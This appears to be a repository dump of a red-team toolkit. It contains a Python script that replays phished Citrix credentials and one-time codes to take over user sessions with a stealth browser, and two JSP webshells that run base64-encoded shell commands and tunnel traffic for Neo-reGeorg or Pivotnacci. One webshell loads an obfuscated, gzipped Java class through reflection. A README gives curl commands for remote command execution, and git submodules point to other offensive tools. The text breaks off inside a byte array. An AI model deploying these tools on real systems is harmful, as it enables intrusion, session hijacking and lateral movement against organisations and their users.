├── .gitmodules ├── Citrix ├── citrix_selenium.py └── requirements.txt ├── jsp-webshell-pivoting ├── README.md ├── jsp-pivotnacci.jsp └── jsp-regeorg.jsp └── unpriv-http-tcp80 ├── README.md ├── unpriv-http-tcp80-v0.3.cs └── unpriv-http-tcp80-v0.3.exe /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "SharpHound4Cobalt"] 2 | path = SharpHound4Cobalt 3 | url = https://github.com/Hypnoze57/SharpHound4Cobalt 4 | [submodule "POSTDump"] 5 | path = POSTDump 6 | url = https://github.com/YOLOP0wn/POSTDump 7 | [submodule "EchoDrv"] 8 | path = EchoDrv 9 | url = https://github.com/YOLOP0wn/EchoDrv 10 | [submodule "CheckDrivers"] 11 | path = CheckDrivers 12 | url = https://github.com/YOLOP0wn/CheckDrivers 13 | [submodule "dark-doh"] 14 | path = dark-doh 15 | url = https://github.com/darksh3llRU/dark-doh 16 | -------------------------------------------------------------------------------- /Citrix/citrix_selenium.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | ''' 4 | Author: POST Cyberforce - COS (Offensive Security Team) 5 | 6 | Usage: 7 | python3 citrix_selenium.py https://citrix.domain.com/ UserName Rand0mPwd123 123456 8 | 9 | Description: 10 | This script is used to replay Citrix credentials + OTP gathered during phishing attack on the real Citrix targeted host. 11 | - Request lib automatically grab the authenticated cookie and passed it to Selenium 12 | - Selenium automatically load the cookie into the browser and connect to the Citrix using a new Thread in order to be able to open several detached session at a time 13 | - Selenium automatically refresh the cookie by refreshing the page every 15 sec. 14 | 15 | Note: 16 | - Use you own way to pass the phished credentials to this script 17 | - You can disable the Selenium function if you want to use the session cookie by yourself or run the script in full headless mode 18 | - Use the chromedriver version according to your Chrome version 19 | ''' 20 | 21 | from termcolor import colored 22 | import sys, time 23 | import requests 24 | import urllib3 25 | from threading import Thread 26 | from selenium_stealth import stealth 27 | from selenium import webdriver 28 | from selenium.webdriver.common.by import By 29 | from selenium.webdriver.support.ui import WebDriverWait, Select 30 | from selenium.webdriver.chrome.options import Options 31 | from selenium.webdriver.support import expected_conditions as ec 32 | from selenium.common.exceptions import NoSuchElementException 33 | 34 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 35 | 36 | HEADERS = { 37 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' 38 | } 39 | 40 | ch_options = Options() 41 | ch_options.add_argument("start-maximized") 42 | ch_options.add_experimental_option("excludeSwitches", ["enable-automation"]) 43 | ch_options.add_experimental_option('useAutomationExtension', False) 44 | ch_options.add_experimental_option("detach", True) 45 | ch_options.add_argument('--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36') 46 | ch_options.add_argument("--log-level=3") 47 | ch_options.add_argument("incognito") 48 | 49 | def get_state_context(host): 50 | uri = 'nf/auth/getAuthenticationRequirements.do' 51 | url = '%s%s' % (host, uri) 52 | 53 | r = requests.post(url, headers=HEADERS, verify=False) 54 | st_ctx = None 55 | try: 56 | st_ctx = r.text.split('StateContext')[1].replace(' >', '').replace('', '').replace(' " % (sys.argv[0])) 180 | print("Example: %s https://citrix.domain.com/ UserName Rand0mPwd123* 123456)" % (sys.argv[0])) 181 | quit() 182 | 183 | host = sys.argv[1] 184 | usr = sys.argv[2] 185 | pwd = sys.argv[3] 186 | otp = sys.argv[4] 187 | threads = [] 188 | 189 | if not host.endswith('/'): 190 | host += '/' 191 | 192 | nsc_cookie = autologin(host, usr, pwd, otp)[1] 193 | if nsc_cookie: 194 | t = Thread(target=selenium_login(nsc_cookie)) 195 | t.start() 196 | threads.append(t) 197 | -------------------------------------------------------------------------------- /Citrix/requirements.txt: -------------------------------------------------------------------------------- 1 | selenium_stealth 2 | requests 3 | selenium 4 | urllib3 5 | termcolor 6 | -------------------------------------------------------------------------------- /jsp-webshell-pivoting/README.md: -------------------------------------------------------------------------------- 1 | !!! Disclaimer !!! 2 | 3 | - The authors do not have any responsibility and/or liability for how you will use this information and the source code! 4 | - Everything that anyone can find in this repository is only for educational and research purposes, and the authors have no responsibility for how you will use the data found. 5 | 6 | JSP webshell with pivoting via Neo-reGeorg or Pivotnacci 7 | 8 | 1) Command exec via GET or POST 9 | 10 | command(s) should be encoded in base64 (GET or POST) to support control operators, ex: id && ls -lah / 11 | 12 | - curl -s 'http://127.0.0.1:8080/jsp-regeorg.jsp?uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' 13 | - curl -s -X POST -d 'uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' -H 'Content-Type: application/x-www-form-urlencoded' 'http://127.0.0.1:8080/jsp-regeorg.jsp' 14 | - curl -s 'http://127.0.0.1:8080/jsp-pivotnacci.jsp?uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' 15 | - curl -s -X POST -d 'uuid=form&darkCMD=aWQgJiYgbHMgLWxhaCAvCg==' -H 'Content-Type: application/x-www-form-urlencoded' 'http://127.0.0.1:8080/jsp-pivotnacci.jsp' 16 | 17 | 18 | 2.a) Pivoting usage Neo-reGeorg -> jsp-regeorg.jsp 19 | 20 | pivoting using Neo-reGeorg (5.0.1), for other versions you have to update the relevant parts in the jsp file 21 | 22 | - python neoreg.py -u 'http://127.0.0.1:8080/jsp-regeorg.jsp?uuid=test' -k PASSWORD -vvvvvvvv 23 | 24 | 2.b) Pivoting usage Pivotnacci -> jsp-pivotnacci.jsp 25 | 26 | pivoting using pivotnacci (0.0.2), for other versions you have to update the relevant parts in the jsp file 27 | 28 | - pivotnacci http://127.0.0.1:8080/jsp-pivotnacci.jsp --password PASSWORD -vvvv 29 | -------------------------------------------------------------------------------- /jsp-webshell-pivoting/jsp-pivotnacci.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*, 2 | java.util.* 3 | " trimDirectiveWhitespaces="true"%> 4 | <%@page contentType="text/html;charset=UTF-8"%> 5 | <%@page pageEncoding="UTF-8"%> 6 | 7 | <%! 8 | final String APP_NAME="jsp webshell v0.3 - Pivotnacci version"; 9 | %> 10 | 11 | <%-- --------------------------------pivotnacci part-------------------------------- --%> 12 | <%@page import="javax.servlet.http.HttpServletRequest, 13 | javax.servlet.http.HttpServletResponse, 14 | javax.servlet.http.HttpSession, 15 | java.nio.ByteBuffer, 16 | java.net.InetSocketAddress, 17 | java.net.InetAddress, 18 | java.net.Socket, 19 | java.net.UnknownHostException, 20 | java.nio.channels.SocketChannel, 21 | java.util.Arrays, 22 | java.util.Random, 23 | java.io.IOException 24 | " trimDirectiveWhitespaces="true" 25 | %> 26 | <%! 27 | 28 | public class Handler { 29 | 30 | private final String ACK_MESSAGE = "Server Error 500 (Internal Error)"; 31 | private final String AGENT_PASSWORD = "PASSWORD"; 32 | 33 | private final String OPERATION_HEADER = "X-OPERATION"; 34 | private final String IP_HEADER = "X-IP"; 35 | private final String PORT_HEADER = "X-PORT"; 36 | private final String ID_HEADER = "X-ID"; 37 | private final String SVC_HEADER = "X-SVC"; 38 | private final String STATUS_HEADER = "X-STATUS"; 39 | private final String ERROR_MESSAGE_HEADER = "X-ERROR"; 40 | private final String PASSWORD_HEADER = "X-PASSWORD"; 41 | 42 | private final String OK_STATUS = "OK"; 43 | private final String FAIL_STATUS = "FAIL"; 44 | private final String INCORRECT_STATUS = "INCORRECT"; 45 | 46 | private final String CONNECT_OPERATION = "CONNECT"; 47 | private final String RECV_OPERATION = "RECV"; 48 | private final String SEND_OPERATION = "SEND"; 49 | private final String DISCONNECT_OPERATION = "DISCONNECT"; 50 | 51 | private final String SOCKET_SESSION_KEY = "socket"; 52 | 53 | private HttpServletRequest request; 54 | private HttpServletResponse response; 55 | private HttpSession session; 56 | 57 | public Handler( 58 | HttpServletResponse response, 59 | HttpServletRequest request, 60 | HttpSession session) { 61 | this.response = response; 62 | this.request = request; 63 | this.session = session; 64 | } 65 | 66 | public void handle() { 67 | String cmd = this.get_header(this.OPERATION_HEADER); 68 | if (cmd == null) { 69 | this.handle_check(); 70 | return; 71 | } 72 | 73 | String password = this.get_header(this.PASSWORD_HEADER); 74 | if (this.AGENT_PASSWORD.compareTo(password) != 0) { 75 | this.handle_check(); 76 | return; 77 | } 78 | 79 | this.handle_post(cmd); 80 | } 81 | 82 | private void handle_check() { 83 | try { 84 | this.response.getWriter().print(this.ACK_MESSAGE); 85 | } catch (IOException e) {} 86 | } 87 | 88 | private void handle_post(String cmd) { 89 | try { 90 | if (cmd.compareTo(this.CONNECT_OPERATION) == 0) { 91 | String addr = request.getHeader(this.IP_HEADER); 92 | int port = Integer.parseInt(request.getHeader(this.PORT_HEADER)); 93 | this.handle_connect(addr, port); 94 | return; 95 | } 96 | 97 | if (!this.is_this_an_adequate_agent()){ 98 | this.set_incorrect_status(); 99 | return; 100 | } 101 | 102 | String socket_id = request.getHeader(this.ID_HEADER); 103 | 104 | if(cmd.compareTo(this.RECV_OPERATION) == 0) { 105 | this.handle_recv(socket_id); 106 | } 107 | else if (cmd.compareTo(this.SEND_OPERATION) == 0) { 108 | this.handle_send(socket_id); 109 | } 110 | else if (cmd.compareTo(this.DISCONNECT_OPERATION) == 0) { 111 | this.handle_disconnect(socket_id); 112 | } 113 | } catch (Exception e) { 114 | this.set_fail_status(e.getMessage()); 115 | } 116 | } 117 | 118 | private void handle_connect(String addr, int port) throws IOException { 119 | SocketChannel socket = this.connect_with_host(addr, port); 120 | String socket_id = this.generate_id(); 121 | 122 | this.set_socket(socket_id, socket); 123 | this.set_ok_status(); 124 | this.response.setHeader(this.SVC_HEADER, this.get_hostname()); 125 | this.response.setHeader(this.ID_HEADER, socket_id); 126 | } 127 | 128 | private SocketChannel connect_with_host(String addr, int port) throws IOException { 129 | SocketChannel socketChannel = SocketChannel.open(); 130 | socketChannel.connect(new InetSocketAddress(addr, port)); 131 | socketChannel.configureBlocking(false); 132 | return socketChannel; 133 | } 134 | 135 | private void handle_recv(String socket_id) throws IOException { 136 | SocketChannel socketChannel = this.get_socket(socket_id); 137 | 138 | ByteBuffer buf = ByteBuffer.allocate(512); 139 | int bytesRead = socketChannel.read(buf); 140 | if (bytesRead == -1) { 141 | set_fail_status("Read failed"); 142 | return; 143 | } 144 | 145 | this.response.setContentType("application/octet-stream"); 146 | this.set_ok_status(); 147 | 148 | ServletOutputStream so = this.response.getOutputStream(); 149 | while (bytesRead > 0){ 150 | so.write(buf.array(),0,bytesRead); 151 | so.flush(); 152 | buf = ByteBuffer.allocate(512); 153 | bytesRead = socketChannel.read(buf); 154 | } 155 | 156 | so.flush(); 157 | so.close(); 158 | } 159 | 160 | private void handle_send(String socket_id) throws IOException { 161 | SocketChannel socketChannel = this.get_socket(socket_id); 162 | int readlen = this.request.getContentLength(); 163 | byte[] buff = new byte[readlen]; 164 | 165 | this.request.getInputStream().read(buff, 0, readlen); 166 | ByteBuffer buf = ByteBuffer.allocate(readlen); 167 | buf.put(buff); 168 | buf.flip(); 169 | 170 | while(buf.hasRemaining()) { 171 | int nbytes = socketChannel.write(buf); 172 | if (nbytes == 0) { 173 | this.set_fail_status("Write failed"); 174 | return; 175 | } 176 | } 177 | this.set_ok_status(); 178 | } 179 | 180 | private void handle_disconnect(String socket_id) { 181 | SocketChannel socketChannel = this.get_socket(socket_id); 182 | try { 183 | socketChannel.socket().close(); 184 | set_ok_status(); 185 | } catch (Exception e) { 186 | set_fail_status(e.getMessage()); 187 | } 188 | this.remove_socket(socket_id); 189 | } 190 | 191 | private boolean is_this_an_adequate_agent() throws UnknownHostException { 192 | return this.get_svc().compareTo(this.get_hostname()) == 0; 193 | } 194 | 195 | private void set_ok_status() { 196 | this.set_header(this.STATUS_HEADER, this.OK_STATUS); 197 | } 198 | 199 | private void set_incorrect_status() { 200 | this.set_header(this.STATUS_HEADER, this.INCORRECT_STATUS); 201 | } 202 | 203 | private void set_fail_status(String msg) { 204 | this.set_header(this.STATUS_HEADER, this.FAIL_STATUS); 205 | this.set_header(this.ERROR_MESSAGE_HEADER, msg); 206 | } 207 | 208 | private String get_hostname() throws UnknownHostException { 209 | return InetAddress.getLocalHost().getHostName(); 210 | } 211 | 212 | private SocketChannel get_socket(String id) { 213 | return (SocketChannel)this.get_attribute(this.SOCKET_SESSION_KEY + id); 214 | } 215 | 216 | private void set_socket(String id, SocketChannel socket) { 217 | this.set_attribute(this.SOCKET_SESSION_KEY + id, socket); 218 | } 219 | 220 | private void remove_socket(String id) { 221 | this.session.removeAttribute(this.SOCKET_SESSION_KEY + id); 222 | } 223 | 224 | private Object get_attribute(String name) { 225 | return this.session.getAttribute(name); 226 | } 227 | 228 | private void set_attribute(String name, Object value) { 229 | this.session.setAttribute(name, value); 230 | } 231 | 232 | private String get_command() { 233 | return this.get_header(this.OPERATION_HEADER); 234 | } 235 | 236 | private String get_svc() { 237 | String svc = this.get_header(this.SVC_HEADER); 238 | if (svc == null) { 239 | svc = ""; 240 | } 241 | 242 | return svc; 243 | } 244 | 245 | private String get_header(String name) { 246 | return this.request.getHeader(name); 247 | } 248 | 249 | private void set_header(String name, String value) { 250 | this.response.setHeader(name,value); 251 | } 252 | 253 | private String generate_id() { 254 | Random random = new Random(); 255 | return Integer.toString(random.nextInt()); 256 | } 257 | 258 | } 259 | 260 | %> 261 | <%-- --------------------------------pivotnacci part END---------------------------- --%> 262 | 263 | <%-- ------------------------------------------------------------------------------- --%> 264 | <% 265 | final String URL=request.getRequestURI(); 266 | final String LPWD=application.getRealPath("/"); 267 | 268 | String param = request.getParameter("uuid"); 269 | 270 | if ( (param != null) && (!param.trim().isEmpty()) && (param.equalsIgnoreCase("form")) ) { 271 | 272 | out.println("LPWD: " + application.getRealPath("/") + "
"); 273 | 274 | String enc_command = request.getParameter("darkCMD"); 275 | byte[] dec_bytes = Base64.getDecoder().decode(enc_command); 276 | String command = new String(dec_bytes); 277 | 278 | String output = ""; 279 | //String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows 280 | String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // UNIX 281 | String[] comm = new String[3]; 282 | comm[0] = COMMAND_INTERPRETER[0]; 283 | comm[1] = COMMAND_INTERPRETER[1]; 284 | comm[2] = command; 285 | 286 | if(command != null) { 287 | String s = null; 288 | try { 289 | Process p = Runtime.getRuntime().exec(comm,null,null); 290 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 291 | while((s = sI.readLine()) != null) { output += s+"
"; } 292 | } 293 | catch(IOException e) { 294 | e.printStackTrace(); 295 | } 296 | } 297 | out.println("Executed command: " + command + "
"); 298 | out.println("Command output:" + "
"); 299 | out.println(output); 300 | 301 | } 302 | // PIVOTING THINGS - Pivotnacci 303 | else{ 304 | Handler handler = new Handler(response, request, session); 305 | handler.handle(); 306 | } 307 | 308 | %> 309 | <%-- ------------------------------------------------------------------------------- --%> 310 | 311 | -------------------------------------------------------------------------------- /jsp-webshell-pivoting/jsp-regeorg.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*, 2 | java.util.* 3 | " trimDirectiveWhitespaces="true"%> 4 | <%@page contentType="text/html;charset=UTF-8"%> 5 | <%@page pageEncoding="UTF-8"%> 6 | 7 | <%! 8 | final String APP_NAME="jsp webshell v0.3 - Neo-reGeorg version"; 9 | %> 10 | 11 | <%-- --------------------------------Neo-regeorg part-------------------------------- --%> 12 | <%! 13 | public static java.util.Map namespace = new java.util.HashMap(); 14 | 15 | public static byte[] unGzip(byte[] bytes) throws Exception{ 16 | java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream(); 17 | java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes); 18 | java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in); 19 | byte[] buffer = new byte[256]; 20 | int n; 21 | while ((n = ungzip.read(buffer)) >= 0) 22 | out.write(buffer, 0, n); 23 | return out.toByteArray(); 24 | } 25 | 26 | public static Class loader(byte[] bytes) throws Exception { 27 | java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader()); 28 | java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class}); 29 | method.setAccessible(true); 30 | Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)}); 31 | return clazz; 32 | } 33 | %> 34 | 35 | <%-- --------------------------------Neo-regeorg part END---------------------------- --%> 36 | 37 | <%-- ------------------------------------------------------------------------------- --%> 38 | <% 39 | final String URL=request.getRequestURI(); 40 | final String LPWD=application.getRealPath("/"); 41 | 42 | String param = request.getParameter("uuid"); 43 | 44 | if ( (param != null) && (!param.trim().isEmpty()) && (param.equalsIgnoreCase("form")) ) { 45 | 46 | out.println("LPWD: " + application.getRealPath("/") + "
"); 47 | 48 | String enc_command = request.getParameter("darkCMD"); 49 | byte[] dec_bytes = Base64.getDecoder().decode(enc_command); 50 | String command = new String(dec_bytes); 51 | 52 | String output = ""; 53 | //String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows 54 | String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // UNIX 55 | String[] comm = new String[3]; 56 | comm[0] = COMMAND_INTERPRETER[0]; 57 | comm[1] = COMMAND_INTERPRETER[1]; 58 | comm[2] = command; 59 | 60 | if(command != null) { 61 | String s = null; 62 | try { 63 | Process p = Runtime.getRuntime().exec(comm,null,null); 64 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 65 | while((s = sI.readLine()) != null) { output += s+"
"; } 66 | } 67 | catch(IOException e) { 68 | e.printStackTrace(); 69 | } 70 | } 71 | out.println("Executed command: " + command + "
"); 72 | out.println("Command output:" + "
"); 73 | out.println(output); 74 | 75 | } 76 | // PIVOTING THINGS - Neo-reGeorg 77 | else{ 78 | String charslist = "OVcdQN+Gp2kISrx9PhwJKsv4qbFT/gao8zeRify1LuAltY7UE65XmH3jBMWD0nCZ"; 79 | Object[] args = new Object[]{ 80 | request, //0 81 | response, //1 82 | charslist.toCharArray(), //2 83 | new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,6,-1,-1,-1,28,60,39,9,54,23,50,49,46,32,15,-1,-1,-1,-1,-1,-1,-1,42,56,62,59,48,26,7,53,11,19,20,40,57,5,0,16,4,35,12,27,47,1,58,51,45,63,-1,-1,-1,-1,-1,-1,30,25,2,3,34,37,29,17,36,55,10,43,52,61,31,8,24,13,21,44,41,22,18,14,38,33,-1,-1,-1,-1,-1},//3 84 | new Integer(200),//4 85 | new Integer(513),//5 86 | new Integer(524288),//6 87 | "9cQYIwVSgdgRh1sK/jQBsHilPXfir3L5sjsdPeYegmfFSy6UT+BXvdg5q3B5KQt5PX2KgmgPhenlJHbIwyh9Svz3g5OYIJB=",//7 88 | new Integer(1868317161),//8 89 | }; 90 | 91 | 92 | if(namespace.get(charslist) == null){ 93 | byte[] clazzBytes = unGzip(new byte[]{31,-117,8,0,-112,-81,-77,99,0,3,-99,57,9,120,27,-43,-47,51,-46,-82,118,37,-81,19,89,-74,28,-81,-81,-112,112,41,-78,-116,33,33,2,-28,36,-112,56,14,49,-79,29,-80,76,-116,-95,64,20,121,109,43,-111,37,35,-55,57,40,77,-95,-123,82,-82,2,-67,-88,67,33,16,-46,-86,-108,-108,35,-128,-30,96,98,-62,21,90,-54,-39,-46,-106,66,91,122,23,-24,1,-91,20,122,-30,127,102,119,37,75,-74,-62,-97,-1,-1,62,-21,29,-13,-26,-51,-101,-21,-51,-52,91,63,-5,-47,35,19,0,112,-110,69,114,64,9,-68,46,-63,-49,36,-72,-49,14,-9,-64,-49,37,120,-128,-5,95,72,-16,-122,3,36,-8,-91,4,-65,-110,-31,-41,18,-4,-58,65,-48,-33,74,-16,59,25,126,47,-61,31,100,120,83,-126,-73,28,80,6,111,115,-13,71,9,-2,-28,-128,10,120,-99,-101,63,59,-64,14,127,-31,-47,59,-68,-23,93,-90,-13,87,30,-67,39,-63,-33,28,80,10,-17,115,-13,119,110,62,-112,-31,67,-58,-2,7,47,-1,83,-122,127,-55,-16,111,9,-2,-29,-128,99,-31,-65,-36,124,36,-63,-92,3,60,8,-36,-96,-124,22,7,-36,-126,86,7,52,-96,32,-93,-24,64,27,74,18,-54,-36,-37,-71,113,-16,74,-119,-116,-118,-124,-91,14,-100,-123,-77,-71,113,-106,96,25,-70,74,-80,28,43,-72,113,-53,88,73,-89,-31,28,38,89,-59,-115,-54,-45,106,110,106,-120,23,-84,117,96,29,-42,83,67,44,82,-13,1,-93,-52,45,-63,-93,112,94,9,-50,71,-105,-116,71,51,-42,49,50,30,-53,43,-57,-55,120,60,-9,30,110,22,112,-29,-107,-79,65,66,-97,3,-50,33,117,96,35,-98,64,35,108,-30,-23,59,50,-98,-56,123,79,34,-115,-32,66,30,45,-110,-15,100,25,23,-13,-36,-17,-128,-115,120,10,55,-89,74,120,-102,3,46,-58,-128,3,-101,113,9,67,-106,-110,73,112,25,-13,112,-70,-116,103,-56,-72,-36,1,-75,76,109,5,-125,90,36,92,73,-104,-16,1,79,90,101,92,-27,-64,51,113,53,111,107,-29,-47,89,14,92,-125,-19,-52,67,-121,-116,-99,12,89,-53,-51,-39,-36,-100,-61,88,93,18,6,29,-80,-107,109,-73,21,-69,101,60,-105,-5,117,50,-10,48,-16,29,-34,120,30,55,-67,50,-98,-49,44,95,-64,-51,39,-72,-71,-112,-101,-117,-56,76,120,-79,3,-82,-59,-11,37,-80,24,67,-36,108,-112,48,-52,-112,62,9,53,9,-5,29,112,61,14,48,-18,-96,-124,17,7,-36,-60,-66,113,19,110,-28,102,19,107,61,-54,-51,16,55,49,9,-29,-28,-112,56,-52,102,-66,-60,78,90,73,72,-104,-76,-61,-83,-36,-89,-20,112,27,38,24,109,-124,-105,55,59,112,11,110,-27,102,27,55,-105,74,-8,73,7,-20,102,41,118,-29,101,-36,124,74,-62,-19,18,126,-38,1,119,-109,-125,-29,-27,18,94,33,-31,103,16,44,90,-116,-102,11,90,-88,-23,-45,120,-76,2,65,78,106,-55,100,36,30,75,34,-52,110,-33,24,-38,28,106,26,73,69,-94,77,29,-95,-31,102,4,123,48,50,16,11,-91,70,18,-124,-67,-72,112,117,-119,49,-115,-122,98,3,77,-63,84,34,18,27,104,-50,-125,-84,-35,-80,81,11,-89,-102,-105,17,13,-37,-110,72,44,-110,90,-122,96,-11,44,88,-121,32,-76,-60,-7,108,-101,118,-55,72,40,74,-121,-70,61,51,-73,45,56,31,65,-36,-32,63,-103,-39,-83,-12,92,-80,98,-63,-52,-77,12,4,-90,84,-23,-103,-71,-70,-128,37,-77,15,106,-95,62,45,-79,73,-37,-122,112,92,49,-92,98,84,29,-83,91,-61,-38,112,-54,80,-120,20,73,70,-29,-31,80,116,26,-105,-39,-3,-60,-91,99,67,116,-13,-59,125,90,88,-105,-55,75,-84,-26,-95,-75,-59,82,-38,-128,-106,32,102,102,74,104,-18,-44,98,-71,-99,51,113,-118,-110,34,-71,-108,72,108,115,124,-109,-42,-95,-91,6,-29,125,8,107,-118,40,112,38,-77,69,-24,47,40,-58,86,105,62,-15,-123,8,23,-2,-97,-87,-73,68,67,-55,-28,17,-97,103,79,-124,98,125,43,-74,-91,52,82,-73,-51,-45,-42,-90,75,-24,-40,-64,-128,-18,56,-119,77,118,102,7,104,35,96,36,-106,-22,-114,-101,-88,-94,-57,-64,-76,109,-42,18,-111,126,50,112,83,17,3,-23,-112,-83,77,49,45,-43,-108,76,70,-101,-126,-63,-10,-96,-31,-21,-70,-23,92,-31,65,45,-68,-87,37,26,-47,-120,110,98,36,-103,-46,72,-103,-127,-84,33,-110,90,120,36,17,73,109,107,10,107,-119,84,-45,121,-117,79,60,-83,-123,6,-111,-2,72,56,-108,-46,-118,104,96,-63,58,9,63,-101,37,26,-44,18,-60,87,-114,-88,107,64,75,45,15,-77,91,105,125,109,-55,-28,-120,-106,32,9,-114,-9,44,56,-94,-93,-24,-122,46,9,71,-11,43,-92,64,6,-10,33,-108,23,-47,-83,2,-9,-62,125,10,-36,15,15,32,-108,-51,-16,27,5,-81,-60,-85,16,-100,-45,-71,38,-11,19,107,61,116,-72,-106,40,88,54,-88,42,-16,93,-8,30,-62,44,29,30,-119,55,-27,16,105,83,75,-100,72,-57,82,-19,90,108,32,53,-120,0,-124,70,-48,-74,-40,-16,72,-118,104,107,-95,33,-30,51,-69,47,15,-86,-32,-25,-16,42,5,-81,-122,23,17,-26,76,103,103,-59,72,36,-38,-57,-36,126,30,-81,33,89,-15,90,5,-81,-61,-21,21,56,0,19,10,-34,-128,95,80,-32,41,120,58,75,87,-33,-105,-69,-84,10,-34,-120,55,41,120,51,-20,83,-16,-117,-84,36,-95,-69,-21,-36,86,5,-65,-124,95,86,-32,9,120,-110,60,38,-95,37,-75,-108,33,113,-10,-22,40,58,37,-10,-113,115,-69,-38,-7,68,34,-15,21,-4,42,66,117,110,97,117,42,53,76,-117,36,110,-116,52,-94,-97,116,11,-93,125,13,71,17,-114,42,116,48,-58,77,78,67,-34,1,-113,40,120,43,126,-99,-62,31,-7,-97,-124,-73,41,120,59,-18,52,79,-104,-38,-86,-5,74,71,40,22,-46,-83,117,7,-34,-87,-32,46,-68,75,-63,-35,-8,13,67,-77,-85,-11,88,-42,25,26,98,-17,119,-21,-20,-23,-111,-72,53,54,50,-92,37,66,124,-104,-124,-33,84,48,-115,-33,82,-16,110,-4,-74,-124,-9,40,-72,7,-65,35,-31,-67,10,-34,-121,-9,43,-8,0,-18,53,-92,55,72,41,-16,24,28,84,-16,65,124,72,-63,-121,49,-93,-64,33,120,70,-127,113,120,84,-63,125,56,38,-31,126,86,41,-15,62,-114,-113,74,120,64,-63,9,124,76,-62,-125,-60,-116,105,-7,70,-61,-12,10,62,-50,-38,45,-21,-90,123,-100,-20,-41,18,-115,-83,28,-46,-56,-104,10,62,1,-124,110,79,-26,14,-60,39,-55,-12,-16,38,62,-91,-32,-45,-8,-108,-79,20,76,81,118,33,-119,-22,-78,-66,-62,-9,123,121,34,17,-38,-74,118,36,-107,-13,26,9,15,41,-8,12,126,-105,89,-70,-106,54,-122,-6,-6,-78,52,-65,-57,-18,116,29,62,-85,-32,-9,-15,122,-124,18,-35,-54,43,70,-6,-5,-39,81,-91,-106,-75,-99,-99,-83,45,-35,10,62,71,126,-128,-49,-29,11,10,-66,-120,47,-27,-37,-73,-115,-102,96,60,-68,-119,110,104,95,31,109,78,-78,27,-68,44,-31,15,20,-4,33,-66,-94,-32,-113,-16,-57,10,-20,-123,7,21,-4,9,-66,74,41,115,-19,26,-14,-83,85,-53,-37,-38,41,32,-83,108,11,-26,14,-8,41,-66,-122,48,-41,32,75,98,-124,7,67,-28,3,-47,100,-109,65,-69,-59,-104,42,-8,58,-93,9,93,-83,-53,87,74,-8,51,5,127,-114,-65,-96,-53,-128,111,40,-8,75,-42,-7,-81,20,-4,53,-2,70,-63,-33,-30,24,49,-65,106,109,87,-49,-14,-82,-107,124,-14,-17,20,-4,61,47,-4,-127,13,121,35,-66,65,89,111,-26,-27,97,-103,-7,-18,-68,73,108,46,93,-54,-93,-73,16,112,41,11,-12,54,-17,122,-101,102,-115,10,-2,17,-1,-92,-32,-97,-15,47,10,-66,67,-105,-117,70,-92,-69,119,121,-12,87,124,79,-63,-65,-15,9,-17,-77,-85,-88,57,29,117,106,-87,45,-15,-60,38,14,38,-119,-2,80,88,83,-16,-17,-8,30,66,69,-127,18,77,-11,101,-99,51,11,62,57,-85,86,-4,-128,-81,-14,126,120,4,-95,118,-122,-79,11,34,-60,-43,122,-124,-64,15,21,120,1,94,84,-32,57,120,94,-127,-105,-32,101,-86,79,-90,37,25,5,-1,-127,-1,84,-16,95,-8,111,5,-1,-125,-1,-51,70,42,29,-95,61,-50,-31,45,111,71,112,48,-98,-96,-120,-10,44,124,95,-127,127,-29,71,18,78,42,22,32,97,45,-120,-93,-118,-59,98,-79,102,3,-96,126,-83,-70,40,43,-59,-121,20,-117,96,17,21,-117,-115,-99,110,-2,-1,30,-85,-77,-95,87,-89,-80,58,-108,28,-92,50,-119,-36,-92,83,-117,39,-76,51,-87,33,-122,-22,-89,69,-116,120,50,21,-93,59,-67,-114,-77,88,-124,93,118,26,2,-97,-112,31,27,40,111,20,-31,35,-113,-121,92,68,-92,-68,65,9,115,93,40,58,-94,-23,-91,87,27,-33,-101,-51,-95,72,52,-76,33,74,16,-127,116,77,17,-48,22,26,30,-42,98,52,104,60,-94,2,-55,-116,-48,-51,102,86,-90,114,78,78,-59,-77,-71,-92,-62,83,-76,-94,-110,54,51,15,107,-5,-71,82,107,-53,-57,-56,22,53,68,108,11,103,-106,-61,84,89,116,-120,-40,31,29,73,82,-106,17,-61,-47,120,-110,-16,-20,-31,-8,-48,112,40,-95,117,-57,15,-77,-121,-124,-99,21,39,-63,-90,34,49,-35,-7,44,123,102,-68,-97,90,35,14,-100,20,53,-70,-88,36,-43,-110,-71,-28,80,66,-96,-107,113,35,12,-111,-66,60,-25,51,39,-114,72,-78,45,-106,76,-123,98,97,98,-93,-100,99,-37,12,11,30,-19,-103,86,119,76,71,-47,69,-86,42,-60,-95,-36,-96,-57,-43,-83,116,84,-119,-98,72,-77,-121,-100,112,88,-61,20,-37,77,-94,8,92,43,32,-12,-104,-107,-52,20,-42,26,109,-101,-23,69,-51,-45,-105,